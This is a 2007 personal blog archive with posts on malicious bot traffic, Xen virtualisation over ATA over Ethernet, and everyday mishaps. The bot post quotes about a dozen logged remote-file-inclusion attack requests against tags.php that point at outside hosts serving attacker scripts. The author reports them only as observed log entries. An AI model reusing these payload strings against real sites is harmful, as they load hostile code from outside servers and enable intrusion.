Monthly Archives: June 2007

Evil Bots

Lately, I’ve been seeing a lot of bot traffic in my logs. Mind you, this isn’t the good kind of bot traffic, like Google bots or other crawlers… It’s the bad stuff – trying to use my site to gain access to my server through nefarious means.

//tags.php?BBCodeFile=http://80.201.236.78/~pat/evilx?
//tags.php?BBCodeFile=http://buceta.789mb.com/cmd1.txt?
//tags.php?BBCodeFile=http://goge.go.ro/b.txt?
//tags.php?BBCodeFile=http://mbrandy.cwsurf.de/eqdkp//includes/vull/echo?
//tags.php?BBCodeFile=http://paginas.terra.com.br/informatica/c4sh/scanz/echo.txt?
//tags.php?BBCodeFile=http://suntikan.org/echo?
//tags.php?BBCodeFile=http://topnlpsites.com/images/gif/echo.txt?
//tags.php?BBCodeFile=http://www.chv.ro/cache/0day?
//tags.php?BBCodeFile=http://www.freewebtown.com/scan/cmd.do?
//tags.php?BBCodeFile=http://www.freewebtown.com/scan/evilx?
//tags.php?BBCodeFile=http://www.freewebtown.com/scan/evilx??
//tags.php?BBCodeFile=http://www.linkchinese.co.uk/452e/help/evilx??
//tags.php?BBCodeFile=http://www.mirrortuning.ru/oneadmin/_files/freeman.txt?

It’s really too bad for the bot makers that they’re creations are wasting their time on my site. It’s written well, which means stupid attacks like this just won’t work.

Xen + AoE = New Hotness

In my continued experimentation with hot migration of Xen environments, I think I’ve found a pretty awesome solution. It involves a system called ATA over Ethernet (AoE). This system transmits ATA commands over ethernet, so it allows for a remote disk to be treated like local block storage. The system was originally designed by a company called Coraid for use with their own proprietary disk arrays, but they produced a piece of software that replicates the same functionality on a normal linux machine.

I was doing experimentation with using NFS root filesystems, but there were a few things I didn’t like about it. First off, creating the kernel was a pain. WIth all of the effort I mentioned in my previous post on the subject, keeping an updated kernel would be a total pain if you were using CentOS 5 like I am. Second, the kernel didn’t seem to perform any caching of the NFS filesytems, so there was a large amount of traffic flowing over the network from all of the filesystem reads that the Xen environments were doing. Third, all of the root filesystem reads/writes were visible to the Xen instances, so their bandwidth counters (and their associated graphs in my Cacti system) were skewed by a large amount.

These issues don’t seem to occur with AoE. The filesystems are imported on the host, so the stock CentOS Xen kernel doesn’t have to be modified in any way. This also renders the network traffic required in maintaining the filesystems invisible to the Xen domains. The filesystem acts as a normal block device, so it is cached like a normal local disk is cached.

That’s not to say there weren’t issues. At first, the vblade daemon (the linux ‘server’ component of the AoE system) seemed pretty unstable. It seemed to randomly lock up, causing all of my Xen domains to crash, and forcing a reboot of the host server. I think it was just the way I was using it though. I was running the vblade program and backgrounding it, instead of using the vbladed script that was provided. I think it was locking things up when I disconnected the termnal in which I started the vblade instances. When the controlling PTY died, it caused the vblade instances to die in a bad way due to a lack of standard input and output channels. The vbladed script controls all of the input and output paths, so there’s no worry if the terminal disconnects. Since I’ve started using vbladed, about three weeks ago, I haven’t had a single failure.

I’m currently running vbladed against the LVM partitions I used with my NFS root filesystems. Off the bat, I thought this would come up a little short because I didn’t have a swap partition available to the Xen domains. Then I remembered that I could use a regular flat file as swap space, so the problem went away.

Since the vblade server allows you to export a whole block device, be it a whole disk, a single partition, a LVM partition, or a whole RAID array, it opens up some interesting possibilities. On the remote system, you can access the exported block device as if it were a disk, partitioning it as you see fit, while on the system exporting, it could be one of many LVM partitions. This allows for the possibility of creating a “mini hard drive” for each Xen instance, each with its own root filesystem, swap space, and whatever else is deemed necessary. I haven’t implemented this because I want to be able to use my LVM partitions with NFS if stability becomes an issue, but it would be a pretty neat setup.

Pains In My Ass

The past few weeks have been a lot of the same old same old. A few noteworthy events have happened though.

About two weeks ago, I noticed a strange smell in my car. I couldn’t place it, and it wasn’t very strong, so I ignored it and went to work. A few hours later, when I went to grab something out of my car, I noticed the smell again. I looked around, and found the source. I had left a gallon of milk in the trunk. It sat there for two or three days I figure, plenty long enough to go bad in the hot summer sun. It had leaked about a quarter to a third of its fluid components out into the trunk lining, and it smelled pretty bad. I immediately threw it away, and used a hose at work to wash the trunk lining out the best I could. The crappy thing is that it leaked down into the piece of fiberboard that seperates the trunk from the spare tire compartment. It soaked in there, and I couldn’t really clean it. I gave it a good dousing with febreeze, and that seemed to do the trick for a few days, but I’ve been noticing that the smell is returning. It’s not really bad, and can be easily subdued by opening a window or turning on the HVAC fans. It still stinks though (pun intended). Hopefully the bacteria will run out of raw materials soon, and the smell will go away on its own.

Last week, my brand new TV decided to die. I was attempting to plug my laptop into the VGA connector to see how things looked, but the TV shut itself off before I could enable the external VGA out on the laptop. This is normal behavior when a VGA signal can’t be found. What isn’t normal behavior is that the TV won’t power on now. I called Polariod tech support, and the customer service rep seemed genuinely surprised about it. I can’t blame him, because it makes no sense. It has to be some sort of buggy firmware or something similar, becuase there’s no reason why a TV should power itself off, and then refuse to power on again, unless it’s expressing a hatred of Star Trek or something. The customer support guy got in contact with a local repair company, and they’ll be out tomorrow to have a look at it. With my recent luck with home theater components, it’ll be broken, and the repair people will have it for a few months. Grand. It’s less than two months old.

I also really need to stop browsing eBay. It’s a really bad idea. The purchases I made last month had more of an effect on my bank account that I realized at the time. Lesson learned I suppose.